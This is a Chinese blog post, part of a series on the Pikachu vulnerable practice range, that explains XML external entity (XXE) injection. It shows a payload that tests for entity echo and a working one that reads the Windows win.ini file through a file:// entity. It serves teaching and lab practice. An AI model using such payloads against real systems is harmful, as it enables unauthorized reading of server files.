xxe-基于Pikachu的学习
1.暴力破解-基于Pikachu的学习2.xss-基于Pikachu的学习3.csrf-基于Pikachu的学习4.SQL注入-基于Pikachu的学习5.RCE-基于Pikachu的学习6.文件包含-基于Pikachu的学习7.filedownload-基于pikachu的学习8.fileupload-基于pikachu的学习9.Over-Permission-基于Pikachu的学习10.目录遍历-基于Pikachu的学习11.敏感数据泄露-基于Pikachu的学习12.unserialize-基于Pikachu的学习
13.xxe-基于Pikachu的学习
14.url重定向-基于Pikachu的学习15.ssrf-基于Pikachu的学习XXE漏洞
XML外部实体注入(XXE)的原理和应用_xml注入原理-CSDN博客
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现_pikachu xxe-CSDN博客
原理
XML外部实体注入漏洞(XML External Entity Injection)简称XXE,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网探测和攻击,发起dos攻击等危害
XML外部实体注入攻击漏洞是在对非安全的外部实体数据进⾏行处理时引发的安全问题,触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件,造成攻击危害。
pikachu
打开题目,随便输入一串,他说得是
那我们就输入以下看看是否回显:
<?xml version="1.0"?>
<!DOCTYPE hack [
<!ENTITY xxe "hack">]>
<hack>&xxe;</hack>
发现有回显:
读取windows.ini的文件的payload如下
<?xml version="1.0"?>
<!DOCTYPE hack [
<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<hack>&xxe;</hack>
结果如下
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Ollama——大语言模型本地部署的极速利器
· 使用C#创建一个MCP客户端
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· ollama系列1:轻松3步本地部署deepseek,普通电脑可用
· 按钮权限的设计及实现